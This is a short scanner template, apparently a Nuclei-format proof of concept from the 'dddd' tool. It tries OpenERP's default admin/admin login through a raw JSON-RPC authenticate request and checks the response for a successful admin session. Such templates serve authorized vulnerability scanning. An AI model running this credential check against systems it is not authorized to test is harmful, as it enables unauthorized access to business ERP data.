dddd/common/config/pocs/openerp-default-password.yaml

id: openerp-default-password

info:
    name: Openerp Default Password
    author: SleepingBag945
    severity: high
    description: app="OpenERP"

http:
  - raw:
      - |
        POST /web/session/authenticate HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Content-Type: application/json
        X-Requested-With: XMLHttpRequest
        Accept-Encoding: gzip, deflate
        Referer: {{BaseURL}}
        Origin: {{BaseURL}}

        {"jsonrpc":"2.0","method":"call","params":{"db":"OPENERP7","login":"admin","password":"admin","base_location":"{{BaseURL}}","session_id":"E10ADC3949BA59ABBE56E057F20F883E","context":{}},"id":"r7"}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\"username\": \"admin\","

      - type: status
        status:
          - 200